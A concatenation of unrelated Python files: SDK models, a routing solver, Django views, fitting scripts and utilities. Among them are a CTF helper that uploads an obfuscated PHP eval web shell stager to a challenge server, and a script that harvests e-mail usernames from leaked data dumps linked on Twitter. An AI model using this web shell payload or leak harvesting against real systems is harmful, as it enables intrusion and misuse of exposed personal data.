            if hasattr(self.event_time, 'to_alipay_dict'):
                params['event_time'] = self.event_time.to_alipay_dict()
            else:
                params['event_time'] = self.event_time
        if self.extra:
            if hasattr(self.extra, 'to_alipay_dict'):
                params['extra'] = self.extra.to_alipay_dict()
            else:
                params['extra'] = self.extra
        if self.inst_ser_apply_no:
            if hasattr(self.inst_ser_apply_no, 'to_alipay_dict'):
                params['inst_ser_apply_no'] = self.inst_ser_apply_no.to_alipay_dict()
            else:
                params['inst_ser_apply_no'] = self.inst_ser_apply_no
        if self.repair_item:
            # NOTE(review): this converts the stored RepairItem objects to
            # dicts *in place*, mutating self.repair_item as a side effect
            # of serialization (pattern inherited from the code generator).
            if isinstance(self.repair_item, list):
                for i in range(0, len(self.repair_item)):
                    element = self.repair_item[i]
                    if hasattr(element, 'to_alipay_dict'):
                        self.repair_item[i] = element.to_alipay_dict()
            if hasattr(self.repair_item, 'to_alipay_dict'):
                params['repair_item'] = self.repair_item.to_alipay_dict()
            else:
                params['repair_item'] = self.repair_item
        if self.status:
            if hasattr(self.status, 'to_alipay_dict'):
                params['status'] = self.status.to_alipay_dict()
            else:
                params['status'] = self.status
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a model instance from a wire dict (None for falsy input)."""
        if not d:
            return None
        o = AlipayInsAutoAutoaftermarketInserviceorderNotifyModel()
        if 'ant_ser_apply_no' in d:
            o.ant_ser_apply_no = d['ant_ser_apply_no']
        if 'event_time' in d:
            o.event_time = d['event_time']
        if 'extra' in d:
            o.extra = d['extra']
        if 'inst_ser_apply_no' in d:
            o.inst_ser_apply_no = d['inst_ser_apply_no']
        if 'repair_item' in d:
            o.repair_item = d['repair_item']
        if 'status' in d:
            o.status = d['status']
        return o
|
import random
import re
import requests
from twitter_scraper import get_tweets
#-----------------------------------------------------------------------------------------------------------------------------
# TODO: will make this more interactive, may use a class here.
# TODO: May use generator here...
# Candidate e-mail domain suffixes, one per line in data/domains.txt.
domains_list = [domain.rstrip('\n') for domain in open('data/domains.txt')]
# set up this word list from my phone in a bar, so pardon the liquor names in there.
#---------------------------------------------------------
def genEmail(length=1, pages=1):
    """Generate *length* synthetic e-mail addresses from scraped usernames.

    Scrapes *pages* pages of dump links for usernames; if fewer users than
    requested are found, returns an explanatory message string instead.
    """
    userlist = getUsers(pages)
    if len(userlist) < length:
        return "Sorry we were only able to gather {} of the requested {} users try increasing pages".format(len(userlist), length)
    emails = []
    for _ in range(length):
        # pair a random scraped username with a random domain suffix
        emails.append(random.choice(userlist) + random.choice(domains_list))
    return emails
def getDumpUrl(pages):
    """Collect the URL lists found in 'dumpmon' tweets across *pages* pages.

    Returns one re.findall result (a list of matched URLs) per tweet.
    """
    print("Gathering Links")
    url_pattern = r"(https?:\/\/(?:www\.|(?!www))[a-zA-Z0-9][a-zA-Z0-9-]+[a-zA-Z0-9]\.[^\s]{2,}|www\.[a-zA-Z0-9][a-zA-Z0-9-]+[a-zA-Z0-9]\.[^\s]{2,}|https?:\/\/(?:www\.|(?!www))[a-zA-Z0-9]\.[^\s]{2,}|www\.[a-zA-Z0-9]\.[^\s]{2,})"
    return [re.findall(url_pattern, tweet['text'])
            for tweet in get_tweets('dumpmon', pages=pages)]
def getUsers(pages):
    """Scrape e-mail addresses from dump URLs and distill them to usernames.

    Args:
        pages: number of tweet pages to scan for dump links.

    Returns:
        list: de-duplicated username strings (e-mail local parts with the
        last two characters stripped) that contain at least one letter.
    """
    urls = getDumpUrl(pages)
    e = []
    users = []
    print('Extracting Emails')
    for url in urls:
        # each url is a findall result list; str(url)[2:-2] strips the
        # surrounding "['" and "']" of its string representation
        s = str(url)[2:-2]
        r = requests.get(s)
        content = str(r.content)
        # local parts of e-mail addresses, including the trailing '@'
        emails = re.findall(r"[a-zA-Z0-9_.+-]+@", content)
        for email in emails:
            if email.find('-')==-1:
                e.append(email)
                #print(email)
    print('Building user list')
    for email in e:
        if len(email)>5 and len(email)<24:
            #print(email, len(email))
            # drop the '@' plus the character before it
            ind = len(email)-2
            user = email[0:ind]
            # keep only candidates containing at least one letter
            if re.match('^(?=.*[a-zA-Z])', user):
                users.append(user)
    users = list(set(users)) #Remove duplicates
    # NOTE(review): this loop has no effect -- rebinding the loop variable
    # `c` does not modify the string `u`.  Presumably digits were meant to
    # be replaced inside the usernames; left untouched pending confirmation
    # of the intent.
    for u in users:
        for c in u:
            if c.isdigit():
                c = replaceDigit(c)
    print("Collected {} users".format(len(users)))
    return users
def replaceDigit(digit):
    """Return a random digit 0-9 different from *digit*.

    Accepts the digit as an int or a one-character string.

    Fixes three defects in the original: ``randrange(0, 9)`` could never
    produce 9; comparing an int to a string digit made the inequality always
    true (so string input could get the "same" digit back); and the
    recursive retry dropped its return value, yielding None on a collision.
    """
    digit = int(digit)
    d = random.randrange(0, 10)
    # retry until the drawn digit differs from the input
    while d == digit:
        d = random.randrange(0, 10)
    return d
|
from requests import models
from botocore.compat import HTTPHeaders
class AWSRequest(models.RequestEncodingMixin, models.Request):
    """A requests.Request subclass carrying an extra AWS ``auth_path``.

    ``auth_path`` is popped from kwargs before delegating to requests'
    constructor (presumably used later during request signing -- confirm
    against the signer code), and the plain header mapping is rebuilt as a
    botocore ``HTTPHeaders`` instance.
    """

    def __init__(self, *args, **kwargs):
        # extract the botocore-specific kwarg before requests sees it
        self.auth_path = None
        if 'auth_path' in kwargs:
            self.auth_path = kwargs['auth_path']
            del kwargs['auth_path']
        models.Request.__init__(self, *args, **kwargs)
        # re-wrap whatever headers requests stored into HTTPHeaders
        headers = HTTPHeaders()
        if self.headers is not None:
            for key, value in self.headers.items():
                headers[key] = value
        self.headers = headers

    def prepare(self):
        """Constructs a :class:`AWSPreparedRequest <AWSPreparedRequest>`."""
        # Eventually I think it would be nice to add hooks into this process.
        p = AWSPreparedRequest(self)
        p.prepare_method(self.method)
        p.prepare_url(self.url, self.params)
        p.prepare_headers(self.headers)
        p.prepare_cookies(self.cookies)
        p.prepare_body(self.data, self.files)
        p.prepare_auth(self.auth)
        return p

    @property
    def body(self):
        # Prepare a throwaway request just to compute the encoded body.
        p = models.PreparedRequest()
        p.prepare_headers({})
        p.prepare_body(self.data, self.files)
        return p.body
class AWSPreparedRequest(models.PreparedRequest):
    """Represents a prepared request.

    :ivar method: HTTP Method
    :ivar url: The full url
    :ivar headers: The HTTP headers to send.
    :ivar body: The HTTP body.
    :ivar hooks: The set of callback hooks.

    In addition to the above attributes, the following attributes are
    available:

    :ivar query_params: The original query parameters.
    :ivar post_param: The original POST params (dict).
    """

    def __init__(self, original_request):
        # keep a handle on the unprepared AWSRequest before the normal
        # PreparedRequest initialization runs
        self.original = original_request
        super(AWSPreparedRequest, self).__init__()
|
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
from django.urls import path, include
from .models import User
def setData(request):
    """Single GET endpoint dispatching on the ``req_code`` query parameter.

    req_code values:
      * ``find``        -- check whether ``userid`` is already taken
      * ``login``       -- check a userid/userpw credential pair
      * ``user_create`` -- create a new User row from the query parameters

    Responds with the plain-text strings "Success"/"Fail" that the client
    parses.  Without a req_code, returns a greeting.

    NOTE(review): credentials travel in GET query strings and are compared
    as plain text, and errors are swallowed by broad ``except`` clauses --
    worth revisiting (POST + hashed passwords + narrower exceptions).
    """
    req_code = request.GET.get("req_code")
    if req_code is not None:
        if req_code == "find":
            try:
                userid = request.GET.get("userid")
                data = User.objects.get(userid=userid)
            except Exception:
                return HttpResponse("Success")  # no duplicate id found: the id is available
            return HttpResponse("Fail")  # a duplicate id exists
        elif req_code == "login":
            try:
                userid = request.GET.get("userid")
                userpw = request.GET.get("userpw")
                data = User.objects.get(userid=userid, userpw=userpw)
            except Exception:
                # no row matches the credential pair
                return HttpResponse("Fail")
            return HttpResponse("Success")
        elif req_code == "user_create":
            try:
                userid = request.GET.get("userid")
                userpw = request.GET.get("userpw")
                phone = request.GET.get("phone")
                birth_date = request.GET.get("date")
                addr = request.GET.get("addr")
                gender = request.GET.get("gend")
                email = request.GET.get("email")
                # email is optional: omit the field entirely when absent
                if email is None:
                    addData = User(userid=userid, userpw=userpw, phone_num=phone, birth_date=birth_date, addr=addr,
                                   gender=gender)
                else:
                    addData = User(userid=userid, userpw=userpw, phone_num=phone, birth_date=birth_date, addr=addr,
                                   gender=gender, email=email)
                addData.save()
            except Exception:
                return HttpResponse("Fail")
            return HttpResponse("Success")
        else:
            # unknown req_code (message text is user-facing Korean; kept as-is)
            return HttpResponse("해당하는 REQ_CODE가 없거나 누락되어있습니다...")
    return HttpResponse("Hello Django~!")
# TODO: format phone numbers, e.g. 01012319900 -> 010-1231-9900
# TODO: format birth dates, e.g. 19980101 -> 1998-01-01
# TODO: e-mail verification after sign-up via SMTP
|
#!/usr/bin/env python
"""
wc.py
!! Runs pretty quickly, even on problems w/ 60k nodes
!! For larger problems, could avoid explicitly computing the distance matrix
"""
import numpy as np
from time import time
from tqdm import tqdm
from tsplib95 import parser
from scipy.spatial.distance import cdist, pdist, squareform
# --
# IO

inpath = '/Users/bjohnson/projects/routing/RoutingSolver/instances/VRPXXL/Antwerp1.txt'

prob = parser.parse(open(inpath).read())

cap = prob['CAPACITY']
n_customers = prob['DIMENSION'] - 1
cw_neighbors = 100
MAX_TOUR_LENGTH = np.inf

coords = list(prob['NODE_COORD_SECTION'].values())
depot, customers = coords[0], coords[1:]

demand = list(prob['DEMAND_SECTION'].values())
demand = demand[1:]
# `np.int` was deprecated in NumPy 1.20 and removed in 1.24 -- use the
# builtin `int` dtype alias instead (identical behavior).
demand = np.array(demand).astype(int)

# --
# Compute distance matrix

dist = squareform(pdist(np.array(customers)))
np.fill_diagonal(dist, np.inf)

dist_to_depot = cdist(np.array(depot).reshape(1, -1), customers).squeeze()

# --
# Compute savings (Clarke-Wright: s_ij = d_i0 + d_0j - d_ij, restricted to
# each customer's cw_neighbors nearest neighbors)

sdist_idx = np.argsort(dist, axis=-1)[:,:cw_neighbors]
sdist_val = np.sort(dist, axis=-1)[:,:cw_neighbors]
saving = dist_to_depot.reshape(-1, 1) + dist_to_depot[sdist_idx] - sdist_val
# saving[saving < 0.1] = 0.1

srcs = np.repeat(np.arange(n_customers), cw_neighbors)
dsts = sdist_idx.ravel()
vals = saving.ravel()

# process candidate merges by decreasing saving; stable sort keeps ties deterministic
p = np.argsort(-vals, kind='stable')
srcs, dsts, vals = srcs[p], dsts[p], vals[p]

# keep each undirected (src, dst) pair only once
sel = srcs < dsts
srcs, dsts, vals = srcs[sel], dsts[sel], vals[sel]

srcs = list(srcs.astype(int))
dsts = list(dsts.astype(int))
vals = list(vals)

# symmetric sparse distance lookup for the retained pairs
dist_lookup = {}
for src, dst, d in zip(srcs, dsts, dist[(srcs, dsts)]):
    dist_lookup[(src, dst)] = d
    dist_lookup[(dst, src)] = d

# free the dense matrices -- only the sparse lookup is needed from here on
del dist
del sdist_idx
del sdist_val
del saving
# --
# Clark-Wright functions
def new_route(src, dst):
    """Open a fresh route [src, dst] if the combined demand fits capacity.

    Mutates the module-level Clarke-Wright state: routes, visited, boundary,
    node2route and route_idx.
    """
    global route_idx

    load = demand[src] + demand[dst]
    cost = dist_to_depot[src] + dist_lookup[(src, dst)] + dist_to_depot[dst]
    if load > cap:
        return

    routes[route_idx] = {
        "idx"   : route_idx,
        "nodes" : [src, dst],
        "load"  : load,
        "cost"  : cost,
    }
    # both endpoints are now visited and sit on the route boundary
    for node in (src, dst):
        visited.add(node)
        boundary.add(node)
        node2route[node] = route_idx

    route_idx += 1
def extend_route(a, b):
    """Append unvisited customer *b* to the route whose boundary endpoint is *a*.

    No-op when the capacity would be exceeded; otherwise *b* replaces *a*
    on the route boundary.
    """
    route = routes[node2route[a]]
    new_load = route['load'] + demand[b]
    new_cost = route['cost'] + dist_lookup[(a, b)] + dist_to_depot[b] - dist_to_depot[a]
    if new_load > cap:
        return

    # b joins the same end of the route that a currently occupies
    nodes = route['nodes']
    if a == nodes[0]:
        nodes.insert(0, b)
    elif a == nodes[-1]:
        nodes.append(b)
    else:
        raise Exception

    route['load'], route['cost'] = new_load, new_cost
    node2route[b] = route['idx']
    visited.add(b)
    boundary.remove(a)
    boundary.add(b)
def merge_route(src, dst):
    """Fuse the two distinct routes whose boundary endpoints are src and dst.

    No-op when both nodes already share a route or the merged load exceeds
    capacity; otherwise the two routes are concatenated into a new one.
    """
    global route_idx

    if node2route[src] == node2route[dst]:
        return

    route_a = routes[node2route[src]]
    route_b = routes[node2route[dst]]

    merged_load = route_a['load'] + route_b['load']
    merged_cost = (route_a['cost'] + route_b['cost']
                   + dist_lookup[(src, dst)]
                   - dist_to_depot[src] - dist_to_depot[dst])
    if merged_load > cap:
        return

    # orient the routes so src ends route_a and dst starts route_b
    if route_a['nodes'][-1] != src:
        route_a['nodes'] = route_a['nodes'][::-1]
    if route_b['nodes'][0] != dst:
        route_b['nodes'] = route_b['nodes'][::-1]

    merged = {
        "idx"   : route_idx,
        "nodes" : route_a['nodes'] + route_b['nodes'],
        "load"  : merged_load,
        "cost"  : merged_cost,
    }

    del routes[node2route[src]]
    del routes[node2route[dst]]
    for node in merged['nodes']:
        node2route[node] = route_idx
    boundary.remove(src)
    boundary.remove(dst)

    routes[route_idx] = merged
    route_idx += 1
# Global Clarke-Wright state shared by new_route / extend_route / merge_route.
routes = {}
visited = set([])
boundary = set([])
node2route = {}
route_idx = 0

t = time()
# Greedy pass over the candidate links in order of decreasing saving.
for (src, dst, val) in zip(srcs, dsts, vals):
    if (src in visited) and (src not in boundary):
        pass  # src is interior to a route -- cannot be linked
    elif (dst in visited) and (dst not in boundary):
        pass  # dst is interior to a route -- cannot be linked
    elif (src not in visited) and (dst not in visited):
        new_route(src, dst)
    elif (src in boundary) and (dst not in visited):
        extend_route(src, dst)
    elif (dst in boundary) and (src not in visited):
        extend_route(dst, src)
    elif (src in boundary) and (dst in boundary):
        merge_route(src, dst)
    else:
        raise Exception

print(time() - t)

# fix customers that haven't been visited
if len(visited) != n_customers:
    for n in range(n_customers):
        if n not in visited:
            # singleton out-and-back route for any leftover customer
            routes[route_idx] = {
                "idx" : route_idx,
                "nodes" : [n],
                "load" : demand[n],
                "cost" : 2 * dist_to_depot[n],
            }
            route_idx += 1

total_cost = sum([r['cost'] for r in routes.values()])
print(total_cost)
# 498791.9977090355
# TomaTo Probleam
# BFS는 queue를 구현해서 만들어야 한다.
def main():
    """Solve the ripening-tomatoes grid problem (M = columns, N = rows).

    Reads the grid from stdin, spreads ripeness breadth-first one day at a
    time, and prints the number of days needed (-1 if some tomato can
    never ripen).
    """
    M, N = map(int, input().split())
    box = [list(map(int, input().split())) for _ in range(N)]
    days = 0
    # seed the frontier with every initially-ripe tomato, as (x, y) pairs
    ripe_frontier = [(x, y) for y in range(N) for x in range(M) if box[y][x] == 1]
    while True:
        box, ripe_frontier = BFS(box, ripe_frontier, N, M)
        if not ripe_frontier:
            break
        days += 1
    # any cell still unripe means it is unreachable
    if any(cell == 0 for row in box for cell in row):
        days = -1
    print(days)
def BFS(box, queue, N, M):
    """Perform one ripening step of the tomato problem.

    Each tomato in `queue` (a list of (x, y) positions) ripens its four
    orthogonal neighbours that are still 0. Mutates `box` in place.

    Fix: renamed the local `dir` -- it shadowed the builtin dir().

    Parameters:
        box: N x M grid; 1 = ripe, 0 = unripe (indexed box[y][x]).
        queue: positions ripened on the previous step.
        N: number of rows; M: number of columns.
    Returns:
        (box, newly_ripe) where newly_ripe lists positions ripened now.
    """
    directions = [(1, 0), (-1, 0), (0, 1), (0, -1)]
    newly_ripe = []
    for x, y in queue:
        for dx, dy in directions:
            new_x = x + dx
            new_y = y + dy
            if (0 <= new_x < M) and (0 <= new_y < N):
                if box[new_y][new_x] == 0:
                    newly_ripe.append((new_x, new_y))
                    box[new_y][new_x] = 1
    return box, newly_ripe
# Run only when executed as a script.
if __name__ == '__main__':
    main()
#least squaresfit
import numpy as np
from matplotlib import pylab as plt
from scipy.optimize import leastsq
import matplotlib.gridspec as gridspec
#Pixels = np.array([1223.5, 1242.5, 1281.5, 1364.5, 1378.5, 1408.5, 1422.5, 1489.5, 1535.5, 1567.5, 1580.5, 1652.5])
# Neon CCD
Pixels = np.loadtxt("Telescope_Neon.txt", usecols = (0,))
#Pixels = np.loadtxt("centroid_for_CCD_Neon1000.txt", usecols = (0,))
#Wavelengths = np.array([5852.49,5881.89,5944.83,6074.34,6096.16,6143.06,6163.59, 6217.28, 6266.49, 6334.43,6382.99,6402.25,6506.53, 6532.88, 6598.95,6678.28, 6717.04, 6929.47,7032.41 ])
#Neon2
#Wavelengths = np.array([5852.49,5881.89,5944.83,6074.34,6096.16,6143.06,6163.59, 6217.28, 6266.49,6334.43,6382.99,6402.25,6506.53, 6532.88, 6598.95,6678.28, 6717.04, 6929.47,7032.41, 7173.94, 7245.17, 7438.90 ])
#Neon1
Wavelengths = np.array([5852.49,5881.89,5944.83,6074.34,6096.16,6143.06,6163.59, 6217.28, 6266.49,6304.79, 6334.43,6382.99,6402.25,6506.53, 6532.88, 6598.95,6678.28, 6717.04, 6929.47,7032.41 ])
ma =np.array([[np.sum(Pixels**2),np.sum(Pixels)],[np.sum(Pixels),len(Pixels)]])
mc =np.array([[np.sum(Pixels*Wavelengths)],[np.sum(Wavelengths)]])
mai = np.linalg.inv(ma)
md = np.dot(mai,mc)
mfit = md[0,0]
cfit = md[1,0]
#mfit = 2.033
#cfit = 3628.99
variance = (1.0/(len(Pixels)-2))*np.sum(Wavelengths-Pixels*mfit-cfit)**2.0
residual = Wavelengths - (mfit*Pixels+cfit)
print mfit,cfit,variance
############## quadratic #################################
x = Pixels
y = Wavelengths
#dy = 0.5
p0 = [2.012, 3645.85, -0.00017]
#fit function
def peval(x, p):
    """Quadratic model: a0 + a1*x + a2*x**2 with p = [a1, a0, a2]."""
    a1, a0, a2 = p[0], p[1], p[2]
    return a0 + a1 * x + a2 * x ** 2
def residuals(p, y, x, peval):
    """Residuals of the observed y against the model peval(x, p)."""
    model = peval(x, p)
    return y - model
# Non-linear least-squares fit of the quadratic model.
p_final = leastsq(residuals,p0,args=(y,x, peval), full_output= True,maxfev=2000)
y_final = peval(x,p_final[0])
chi2 = np.sum((y - y_final)**2)#/ ((dy)**2))
resi = (residuals(p_final[0],y,x,peval))
dof = len(y)-len(p0)   # degrees of freedom
chi_re2 = chi2/dof # residual variance
# scale the covariance returned by leastsq by the residual variance
cov = p_final[1] * chi_re2
cov_xy = cov[0][1]
cov_x = np.sqrt(cov[0][0])
cov_y = np.sqrt(cov[1][1])
# sample linear correlation coefficient between the two leading parameters
r = cov_xy/(cov_x*cov_y)
print "The inital parameter (p0) we used is:\n", p0
print "What we get as a parameter:", p_final[0]
# NOTE(review): leastsq reports success with flags 1-4; only 1 is accepted here.
if p_final[4] == 1: # change p_final[1] to success
    print "It converges."
else:
    print "It does not converge."
print "The Chi square is: \t\t\t",round(chi2,2)
print "The Chi-reduced square is: \t\t", round(chi_re2,2)
print
print "Cov_xy:",round(cov_xy,4), "\nCov_x: ",round(cov_x,4),"\nCov_y: ", round(cov_y,4)
print "Sample coefficient of linear correlation (r): ", round(r,2)
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print
'''
plt.figure(1)
plt.subplot(2,1,1)
plt.scatter(x,y)
plt.plot(x,peval(x, p_final[0]), color='r',label='fit plot')
'''
# Top panel: data and fitted curve.
plt.figure(1 , figsize=(9,6))
plt.subplot(2,1,1)
plt.plot(Pixels,Wavelengths,'o',label="data")
plt.plot(Pixels,peval(Pixels, p_final[0]), color='r',label='fit plot')
plt.legend(loc=4)
'''
# Night2
plt.text(275, 7300, 'a_1 = 4846.31')
plt.text(275, 7200, 'a_2 = 3.848')
plt.text(275, 7100, 'a_2 = -1.76E(-4))')
plt.text(275, 7000, 'variance = 3.95E(-21)')
'''
# Night 1 annotations (hard-coded from a previous run -- TODO confirm
# they still match the current fit).
plt.text(475, 7000, 'a_0 = 3828.52')
plt.text(475, 6900, 'a_1 = 4.21')
#plt.text(475, 6800, 'a_2 = 4.72E(-5))')
plt.text(475, 6800, 'variance = 3.80E(-20)')
#wavelength = 3828.52 + (4.21*pixel)
'''
#CCD
plt.text(1230, 7000, 'a_0 = 3645.85')
plt.text(1230, 6900, 'a_1 = 2.01')
plt.text(1230, 6800, 'a_2 = -1.76E(-4))')
plt.text(1230, 6700, 'variance = 5.23E(-21)')
'''
#wavelength = 3645.85 + (2.01*pixel) +(-0.000176*(pixel**2))
plt.xlabel("Pixel Number")
plt.ylabel("Wavelength (Angstrom)")
plt.title("Wavelength Fitting for Neon")
# Bottom panel: residuals of the LINEAR fit.
#plt.figure(2, figsize=(9,3))
plt.subplot(2,1,2)
plt.scatter (Pixels, residual)
plt.xlabel("Pixel Number")
plt.ylabel("Residual")
plt.title("Linear Residual")
'''
plt.subplot(1,2,2)
plt.scatter (Pixels, resi)
plt.xlabel("Pixel Number")
plt.ylabel("Residual")
plt.title("Quadratic Residual")
'''
plt.tight_layout()
plt.show()
# -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2018-09-10 21:54
from __future__ import unicode_literals
from django.db import migrations
def add_file_types(apps, schema_editor):
    """Create a FileType row for each known extension and point every
    matching FileResource's file_type2 at it."""
    FileResource = apps.get_model('tantalus', 'FileResource')
    FileType = apps.get_model('tantalus', 'FileType')
    for type_name in ('BAM', 'BAI', 'FQ'):
        # extension is the lowercase name with a leading dot, e.g. '.bam'
        file_type, _ = FileType.objects.get_or_create(
            name=type_name, extension='.' + type_name.lower())
        matching = FileResource.objects.filter(file_type=type_name)
        matching.update(file_type2=file_type)
class Migration(migrations.Migration):
    """Data migration: backfill FileResource.file_type2 from FileType rows."""

    dependencies = [
        ('tantalus', '0064_auto_20180910_2224'),
    ]
    operations = [
        # NOTE(review): no reverse_code is supplied, so this migration is
        # irreversible.
        migrations.RunPython(add_file_types),
    ]
|
import numpy as np
from sklearn import metrics
def find_top_labels(true):
    """Return label (column) indices of `true` ordered from most to least
    frequent."""
    counts_per_label = np.sum(true, axis=0)
    descending = np.argsort(counts_per_label)[::-1]
    return descending
def eval_all(L_hat, L, preds, true, idx_to_find, k_list, gen_curve=True):
    """Compute a battery of multi-label evaluation metrics and print them.

    Args (shapes assumed samples x labels -- TODO confirm against caller):
        L_hat: real-valued predicted score matrix.
        L: ground-truth score/label matrix aligned with L_hat.
        preds: binarized predictions.
        true: binarized ground truth.
        idx_to_find: label indices ordered by frequency (see find_top_labels).
        k_list: values of k for precision@k.
        gen_curve: if True, sweep top-n labels to build full P/R/F1 curves;
            otherwise compute only the single all-labels point.

    Returns:
        (list of P@k values, hamming loss, jaccard similarity,
         precision curve, recall curve, f1 curve), each rounded/averaged
        as computed below.
    """
    # P@k
    def eval_prec_at_k(k):
        acc = 0
        for i in range(len(L_hat)):
            # indices of the k highest-scoring labels for sample i
            idx = L_hat[i].argsort()[::-1][: k]
            prec = np.sum(np.equal(L_hat[i][idx] > 0 ,np.equal(L[i][idx] > 0 , L_hat[i][idx] > 0))) / k
            acc += prec
        print('P@{}:'.format(k), acc / len(L_hat))
        return acc / len(L_hat)
    # Hamming loss, averaged over samples
    def eval_hamming_loss():
        loss = 0
        for i in range(len(L_hat)):
            loss += metrics.hamming_loss(preds[i], true[i])
        print('Hamming_loss:', loss / len(L_hat))
        return loss / len(L_hat)
    # Jaccard similarity, averaged over samples
    # NOTE(review): jaccard_similarity_score was removed in modern
    # scikit-learn (renamed jaccard_score) -- verify installed version.
    def eval_jaccard_sim():
        acc = 0
        for i in range(len(L_hat)):
            acc += metrics.jaccard_similarity_score(preds[i], true[i])
        print('Jaccard similarity:', acc / len(L_hat))
        return acc / len(L_hat)
    # Precision, recall, F1 curve over the top-n most frequent labels
    def eval_pre_rec_f1():
        num_labs = L.shape[1]
        pre_curv = np.zeros(num_labs)
        rec_curv = np.zeros(num_labs)
        f1_curv = np.zeros(num_labs)
        start_idx = 1
        if not gen_curve:
            # only compute the final (all labels) point
            start_idx = num_labs
            pre_curv = np.zeros(1)
            rec_curv = np.zeros(1)
            f1_curv = np.zeros(1)
        for top_n in range(start_idx, num_labs + 1):
            pre, rec, f1, spt = metrics.precision_recall_fscore_support(true[:, idx_to_find[:top_n]], preds[:, idx_to_find[:top_n]])
            # support-weighted averages across labels
            pre_curv[top_n - start_idx] = np.average(pre, weights=spt)
            rec_curv[top_n - start_idx] = np.average(rec, weights=spt)
            f1_curv[top_n - start_idx] = np.average(f1, weights=spt)
        print('Precision:', pre_curv[-1])
        print('Recall:', rec_curv[-1])
        print('F1:', f1_curv[-1])
        return pre_curv.round(5), rec_curv.round(5), f1_curv.round(5)
    ret = []
    for k in k_list:
        val = eval_prec_at_k(k)
        ret.append(val)
    h_loss = eval_hamming_loss()
    j_sim = eval_jaccard_sim()
    pre_c, rec_c, f1_c = eval_pre_rec_f1()
    print('-' * 50)
    return (ret, h_loss, j_sim, pre_c, rec_c, f1_c)
class BankAccount:
    """A simple bank account record.

    Fix: the class was declared as ``BankAccout`` (typo) while the rest of
    the module instantiates ``BankAccount``, raising NameError at import.
    """

    def __init__(self, account_number, name, password, value, admin):
        self.account_number = account_number  # e.g. "0001-1"
        self.name = name          # account holder's display name
        self.password = password  # NOTE(review): stored in plain text
        self.value = value        # current balance
        self.admin = admin        # True for administrator accounts


# Backward-compatible alias preserving the original (misspelled) name.
BankAccout = BankAccount
# Seed data: three regular accounts and one administrator account.
# NOTE(review): the class above is declared `BankAccout` (typo), so this
# list raises NameError at import time until the class name is fixed.
accounts_list = [
    BankAccount('0001-1', 'Dinaerte Neto', '123456', 1000, False),
    BankAccount('0001-2', 'Dinaerte Neto', '123456', 1000, False),
    BankAccount('0001-3', 'Dinaerte Neto', '123456', 1000, False),
    BankAccount('0000-0', 'Administrator', '123456', 1000, True),
]
from email.mime.text import MIMEText
import smtplib
from email import encoders
from email.header import Header
from email.utils import parseaddr, formataddr
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
def _format_addr(s):
name, addr = parseaddr(s)
return formataddr((Header(name, 'utf-8').encode(), addr))
# Prompt for the sender's address and SMTP authorization code
from_addr = input('From(QQ邮箱):')
password = input('Password(授权码):')
# Prompt for the recipient address
to_addr = input('To:')
# Prompt for the SMTP server address
smtp_server = input('SMTP server:')

# Build the message: a multipart container (text body + image attachment)
msg = MIMEMultipart()
# msg = MIMEText('真不知道说啥', 'plain', 'utf-8')  # plain-text alternative
# msg = MIMEText('<html><body><h1>Hello</h1>' +
#                '<p>send by <a href="http://www.python.org">Python</a>...</p>' +
#                '</body></html>', 'html', 'utf-8')  # HTML alternative
msg['From'] = _format_addr('Python爱好者 <%s>' % from_addr)
msg['To'] = _format_addr('管理员 <%s>' % to_addr)
msg['Subject'] = Header('来自SMTP的问候……', 'utf-8').encode()
# The message body is a MIMEText part:
msg.attach(MIMEText('send with file...', 'plain', 'utf-8'))
# Attachment: a MIMEBase part built from a local image file
with open('C:\\Users\\administrator\Desktop\\QQ20181112103228.png', 'rb') as f:
    mime = MIMEBase('image', 'png', filename='QQ20181112103228.png')
    mime.add_header('Content-Disposition', 'attachment', filename='QQ20181112103228.png')
    mime.add_header('Content-ID', '<0>')
    mime.add_header('X-Attachment-Id', '0')
    mime.set_payload(f.read())
    # base64-encode the binary payload for transport
    encoders.encode_base64(mime)
    msg.attach(mime)

server = smtplib.SMTP(smtp_server, 25)  # default SMTP port is 25
server.set_debuglevel(1)                # print the SMTP conversation
server.login(from_addr, password)
server.sendmail(from_addr, [to_addr], msg.as_string())
server.quit()
# Riffle-shuffle a deck read from stdin: interleave the first half with the
# second half, repeated a given number of times, then print the deck.
cards = input().split()
shuffles_count = int(input())
middle_len = len(cards) // 2  # NOTE(review): for odd-length decks the last card is dropped -- confirm intended
for _ in range(shuffles_count):
    shuffled = []
    for index in range(middle_len):
        # take one card from each half, alternating
        shuffled.append(cards[index])
        shuffled.append(cards[index + middle_len])
    cards = shuffled
# FIX: print the deck, not the loop-local `res` -- the original raised
# NameError when shuffles_count was 0.
print(cards)
|
#!/usr/bin/env python3
# CTF helper: uploads a PHP eval stager through the `data` GET parameter.
import requests
import sys
# FIX: `import urllib` alone does not guarantee the `urllib.parse`
# submodule is loaded; import it explicitly.
import urllib.parse
"""
<?;eval(${"\x5f\x47\x45\x54"}[0]);
"""
# PHP payload: eval() whatever arrives in $_GET[0] ("\x5f\x47\x45\x54" spells "_GET").
cmd = '<?;eval(${"\\x5f\\x47\\x45\\x54"}[0]);'
cmd = urllib.parse.quote_plus(cmd)
headers = {
    # Note: put your browser user-agent here to have the same behaviour here and in browser
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36',
}
url = 'http://pwnable.org:47780/?action=upload&data=' + cmd
print('URL:', url)
r = requests.get(url, headers=headers)
print('Status Code:', r.status_code)
print('Response:')
print(r.text)
|
import functools


def error_handling(func):
    """Decorator: return the wrapped function's result, or the string
    'null' if it raises any exception (best-effort scraping fields).

    Fix: functools.wraps preserves the wrapped function's metadata, and the
    unused `as ex` binding was dropped.
    """
    @functools.wraps(func)
    def func_wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception:
            # deliberately swallow errors; callers treat 'null' as "missing"
            return 'null'
    return func_wrapper
@error_handling
def get_title(response, path):
    """Return the first title node matched by *path* ('null' on failure)."""
    return response.xpath(path).extract()[0]
@error_handling
def get_content(response, path):
    """Return all matched content fragments joined by spaces ('null' on failure)."""
    fragments = response.xpath(path).extract()
    return " ".join(fragments)
@error_handling
def get_author(response, path):
    """Return all matched author fragments joined by spaces ('null' on failure)."""
    matched = response.xpath(path).extract()
    return ' '.join(matched)
